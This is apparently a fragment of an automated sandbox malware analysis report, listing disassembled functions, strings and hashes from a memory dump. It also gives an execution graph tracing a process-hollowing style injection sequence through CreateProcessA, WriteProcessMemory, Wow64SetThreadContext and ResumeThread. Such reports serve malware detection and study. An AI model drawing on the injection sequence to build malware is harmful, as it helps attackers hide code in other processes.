                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A94000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000B00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_990000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcsnlen
                                                                                                    • String ID: Bias$DaylightBias$DaylightName$DaylightStart$DynamicDaylightTimeDisabled$StandardBias$StandardName$StandardStart$TimeZoneKeyName
                                                                                                    • API String ID: 3628947076-1387797911
                                                                                                    • Opcode ID: 7ca3069ca0cf82ca7d734eb6736a8163dcda856e0aa65935401c4bc2b647868a
                                                                                                    • Instruction ID: 81d9d84a459f1e9327b550393b06bd570cc6f2f3929ed1bcb5c157d4569d5ca3
                                                                                                    • Opcode Fuzzy Hash: 7ca3069ca0cf82ca7d734eb6736a8163dcda856e0aa65935401c4bc2b647868a
                                                                                                    • Instruction Fuzzy Hash: 4841E979740319BEEB019E90EE42FDF77ACAF45B44F100122BA00D9091DBB4FB518BA4
                                                                                                    Function 009F13CB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.418645615.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A94000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000B00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_990000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ___swprintf_l
                                                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                    • API String ID: 48624451-2108815105
                                                                                                    • Opcode ID: 9d5ce98cec4412846f1ae61997720b108428b158487b3d0b9774a79eba29256d
                                                                                                    • Instruction ID: d93b18219272e5173e50cebf286d090a232cd2b4fc2ec69c5ac9adf780fee3b9
                                                                                                    • Opcode Fuzzy Hash: 9d5ce98cec4412846f1ae61997720b108428b158487b3d0b9774a79eba29256d
                                                                                                    • Instruction Fuzzy Hash: 5F613871900659EACF34CF9AC8908BEBBB9EFD4310714C42DFAD647540D374AA40CBA0
                                                                                                    Function 00A53B8E Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 187COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.418645615.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A94000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000B00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_990000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ___swprintf_l
                                                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                    • API String ID: 48624451-2108815105
                                                                                                    • Opcode ID: 010659198b78633bf2220596e87811a9526acb31737b4b1cc21367f5a97fdc83
                                                                                                    • Instruction ID: 70506e7f0936878756de04b9794823c36602662bd4048b62fe3fc0be40af4d43
                                                                                                    • Opcode Fuzzy Hash: 010659198b78633bf2220596e87811a9526acb31737b4b1cc21367f5a97fdc83
                                                                                                    • Instruction Fuzzy Hash: EC6190B3900648AACF20DF99C9404BE7BF5FF94392B14C569FCA9A7141E234EB489B50
                                                                                                    Function 009E7EFD Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00A03F12
                                                                                                    Strings
                                                                                                    • Execute=1, xrefs: 00A03F5E
                                                                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00A03EC4
                                                                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00A03F4A
                                                                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00A0E2FB
                                                                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 00A0E345
                                                                                                    • ExecuteOptions, xrefs: 00A03F04
                                                                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00A03F75
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.418645615.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A94000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000B00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_990000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: BaseDataModuleQuery
                                                                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                    • API String ID: 3901378454-484625025
                                                                                                    • Opcode ID: 025867061667c861f57006cf128499bdf2f002c89be552d3c4b976e8586bfa3d
                                                                                                    • Instruction ID: 52655d215fa7f5c7d3201bf60dff6823e5e030b42eb2eab9ed7f2c10d6d0af18
                                                                                                    • Opcode Fuzzy Hash: 025867061667c861f57006cf128499bdf2f002c89be552d3c4b976e8586bfa3d
                                                                                                    • Instruction Fuzzy Hash: 1141C672A4021D7ADF21DB95DDC6FEAB3BCAB54704F0009A9B105A60C2EA70AE458F61
                                                                                                    Function 009F0B15 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.418645615.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A94000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000B00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_990000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __fassign
                                                                                                    • String ID: .$:$:
                                                                                                    • API String ID: 3965848254-2308638275
                                                                                                    • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                    • Instruction ID: 40fa7480716fe85591515bc5ef326a0c98e6045a083758abaa286ae9a4a87c2a
                                                                                                    • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                    • Instruction Fuzzy Hash: 51A19B71D0430EEBCF24CF64C8457BEB7BCAF95305F24856ADA86A7283D6349A81CB51
                                                                                                    Function 009F0554 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A12206
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.418645615.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A94000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000B00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_990000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                    • API String ID: 885266447-4236105082
                                                                                                    • Opcode ID: 1d5a0af4b8faa3273e60d95d7dcb670679ab10ffbe0f9b7fa20f0873a88fddca
                                                                                                    • Instruction ID: bbb497b358deb1e2571cad1638ccf001397f1b4fbbaddaf7fe02368a5ee03e4f
                                                                                                    • Opcode Fuzzy Hash: 1d5a0af4b8faa3273e60d95d7dcb670679ab10ffbe0f9b7fa20f0873a88fddca
                                                                                                    • Instruction Fuzzy Hash: 1B512731B402156FEB14CB18DC81FE633A9ABD4724F218229FD59DF286DA75EC918790
                                                                                                    Function 009F14C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___swprintf_l.LIBCMT ref: 00A1EA22
                                                                                                      • Part of subcall function 009F13CB: ___swprintf_l.LIBCMT ref: 009F146B
                                                                                                      • Part of subcall function 009F13CB: ___swprintf_l.LIBCMT ref: 009F1490
                                                                                                    • ___swprintf_l.LIBCMT ref: 009F156D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.418645615.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A94000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000B00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_990000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ___swprintf_l
                                                                                                    • String ID: %%%u$]:%u
                                                                                                    • API String ID: 48624451-3050659472
                                                                                                    • Opcode ID: 9cf865b29951035239dff461af28736fae61d64372a449cd46ad20b1be80daf2
                                                                                                    • Instruction ID: aa5fe12c5436883a6e16dd65347f833a868a97a2602df93d2c92afafbac39cc1
                                                                                                    • Opcode Fuzzy Hash: 9cf865b29951035239dff461af28736fae61d64372a449cd46ad20b1be80daf2
                                                                                                    • Instruction Fuzzy Hash: 5A21AE7290021DEBCB21DFA8CC41AFAB3ACAB90714F544416FE46E3140DB75AA588BE1
                                                                                                    Function 00A53DA7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 82COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.418645615.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A94000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000B00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_990000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ___swprintf_l
                                                                                                    • String ID: %%%u$]:%u
                                                                                                    • API String ID: 48624451-3050659472
                                                                                                    • Opcode ID: b1faa69c4f57f4a90750f835c79f2874602b7c31edd3864d5b4f79677913dc67
                                                                                                    • Instruction ID: ebb6bcbf309dcf86cedf47efc29bff40384613add6f6bde2e19187cef49b9eed
                                                                                                    • Opcode Fuzzy Hash: b1faa69c4f57f4a90750f835c79f2874602b7c31edd3864d5b4f79677913dc67
                                                                                                    • Instruction Fuzzy Hash: 7D21BD7390021AABCF20AF6999429EF77ECAB94795F040525FC08A3141EB749E4887E1
                                                                                                    Function 009D53A5 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A122F4
                                                                                                    Strings
                                                                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00A122FC
                                                                                                    • RTL: Re-Waiting, xrefs: 00A12328
                                                                                                    • RTL: Resource at %p, xrefs: 00A1230B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.418645615.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A94000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000B00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_990000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                    • API String ID: 885266447-871070163
                                                                                                    • Opcode ID: c2dee7a0b200185f6326e00aa31b5f7c4f710de3fe34766f06c91ac1e87e48cd
                                                                                                    • Instruction ID: 105bb517aff6fd2cc6f1d1bd75ef5c64d5a536ca235f52e48ce92bb57fb60843
                                                                                                    • Opcode Fuzzy Hash: c2dee7a0b200185f6326e00aa31b5f7c4f710de3fe34766f06c91ac1e87e48cd
                                                                                                    • Instruction Fuzzy Hash: 03510771640705ABDB159B28CC81FE7739CAF94360F11862AFD19DB281EA75ED8187A0
                                                                                                    Function 009DEC56 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 00A1248D
                                                                                                    • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 00A124BD
                                                                                                    • RTL: Re-Waiting, xrefs: 00A124FA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.418645615.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A94000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000B00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_990000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                                                                    • API String ID: 0-3177188983
                                                                                                    • Opcode ID: 433ef0a57b163ead6c22949784bd2ba7f5d2452b372e24121a25b0d8cb7cb23b
                                                                                                    • Instruction ID: 37538f85dbec3d9d18a931b4a39ad142e806e836cf187a753030cf1025c7fe0d
                                                                                                    • Opcode Fuzzy Hash: 433ef0a57b163ead6c22949784bd2ba7f5d2452b372e24121a25b0d8cb7cb23b
                                                                                                    • Instruction Fuzzy Hash: 9E41F870600204ABCB24EF68DD85FAA77A8EF84720F208A16F555DF3D1D778E99187A1
                                                                                                    Function 009EFCC9 Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.418645615.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A94000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000B00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_990000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __fassign
                                                                                                    • String ID:
                                                                                                    • API String ID: 3965848254-0
                                                                                                    • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                    • Instruction ID: b8d89b591b0596be336de950b2a42c5442b94efa075d8c47f9a7ca32712a2d25
                                                                                                    • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                    • Instruction Fuzzy Hash: B6918031D0028AEBDF26CF5AC8556EEB7B4EF55314F24847BD801A7192E7305E81CB91
                                                                                                    Function 00A65CFA Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 237COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.418645615.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A94000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000B00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_990000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __aulldvrm
                                                                                                    • String ID: $$0
                                                                                                    • API String ID: 1302938615-389342756
                                                                                                    • Opcode ID: 3b59b3e023a6777e686c36e22940a2771ddb2b6e8c29f2aacad418ae84f83d50
                                                                                                    • Instruction ID: b131783db2001ec95285b32a5420556ad68f140667cb6879fde729bcce4ff2c6
                                                                                                    • Opcode Fuzzy Hash: 3b59b3e023a6777e686c36e22940a2771ddb2b6e8c29f2aacad418ae84f83d50
                                                                                                    • Instruction Fuzzy Hash: 2991CF70D04A8AEFDF25CFB9C8553EEBBB1AF41310F14469AD8A1A72D1C7758A41CB90

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:20.1%
                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                    Signature Coverage:0%
                                                                                                    Total number of Nodes:92
                                                                                                    Total number of Limit Nodes:4
                                                                                                    execution_graph 9081 24fad5 9082 24fadf 9081->9082 9083 24fb93 9081->9083 9083->9082 9085 a51138 9083->9085 9086 a5114d 9085->9086 9090 a511de 9086->9090 9104 a51168 9086->9104 9087 a5115f 9087->9083 9091 a5116c 9090->9091 9093 a511e1 9090->9093 9117 a515a4 9091->9117 9121 a517ea 9091->9121 9126 a5188a 9091->9126 9131 a51ab9 9091->9131 9136 a519b3 9091->9136 9141 a515c0 9091->9141 9146 a518f0 9091->9146 9151 a51921 9091->9151 9156 a51a66 9091->9156 9160 a51647 9091->9160 9092 a5119a 9092->9087 9105 a51192 9104->9105 9107 a515a4 CreateProcessA 9105->9107 9108 a51647 2 API calls 9105->9108 9109 a51a66 2 API calls 9105->9109 9110 a51921 2 API calls 9105->9110 9111 a518f0 2 API calls 9105->9111 9112 a515c0 CreateProcessA 9105->9112 9113 a519b3 2 API calls 9105->9113 9114 a51ab9 2 API calls 9105->9114 9115 a5188a 2 API calls 9105->9115 9116 a517ea 2 API calls 9105->9116 9106 a5119a 9106->9087 9107->9106 9108->9106 9109->9106 9110->9106 9111->9106 9112->9106 9113->9106 9114->9106 9115->9106 9116->9106 9118 a515d7 9117->9118 9165 24f400 9118->9165 9122 a517f7 9121->9122 9169 24f061 9122->9169 9173 24f068 9122->9173 9123 a51bad 9123->9092 9127 a51b3b 9126->9127 9177 24e5a0 9127->9177 9181 24e598 9127->9181 9128 a51b56 9128->9092 9132 a51abf 9131->9132 9185 24f1c0 9132->9185 9189 24f1c8 9132->9189 9133 a51ae2 9133->9092 9137 a519c3 9136->9137 9139 24f061 WriteProcessMemory 9137->9139 9140 24f068 WriteProcessMemory 9137->9140 9138 a51cf3 9139->9138 9140->9138 9144 a515b1 9141->9144 9142 a52071 9142->9092 9143 a5160a 9143->9092 9144->9142 9145 24f400 CreateProcessA 9144->9145 9145->9143 9147 a518fd 9146->9147 9193 24e4b0 9147->9193 9197 24e4a8 9147->9197 9148 a51967 9152 a51952 9151->9152 9154 24e4b0 ResumeThread 9152->9154 9155 24e4a8 ResumeThread 9152->9155 9153 a51967 9154->9153 9155->9153 9158 24f061 WriteProcessMemory 9156->9158 9159 24f068 WriteProcessMemory 9156->9159 9157 a51a8e 9158->9157 9159->9157 9161 a5165c 9160->9161 9201 24ef40 9161->9201 9205 24ef38 9161->9205 9162 a51c0e 9162->9092 9166 24f487 CreateProcessA 9165->9166 9168 24f6e5 9166->9168 9170 24f0b4 WriteProcessMemory 9169->9170 9172 24f153 9170->9172 9172->9123 9174 24f0b4 WriteProcessMemory 9173->9174 9176 24f153 9174->9176 9176->9123 9178 24e5e9 Wow64SetThreadContext 9177->9178 9180 24e667 9178->9180 9180->9128 9182 24e5e9 Wow64SetThreadContext 9181->9182 9184 24e667 9182->9184 9184->9128 9186 24f214 ReadProcessMemory 9185->9186 9188 24f292 9186->9188 9188->9133 9190 24f214 ReadProcessMemory 9189->9190 9192 24f292 9190->9192 9192->9133 9194 24e4f4 ResumeThread 9193->9194 9196 24e546 9194->9196 9196->9148 9198 24e4f4 ResumeThread 9197->9198 9200 24e546 9198->9200 9200->9148 9202 24ef84 VirtualAllocEx 9201->9202 9204 24f002 9202->9204 9204->9162 9206 24ef40 VirtualAllocEx 9205->9206 9208 24f002 9206->9208 9208->9162

                                                                                                    Executed Functions

                                                                                                    Function 0024F400 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 323processCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
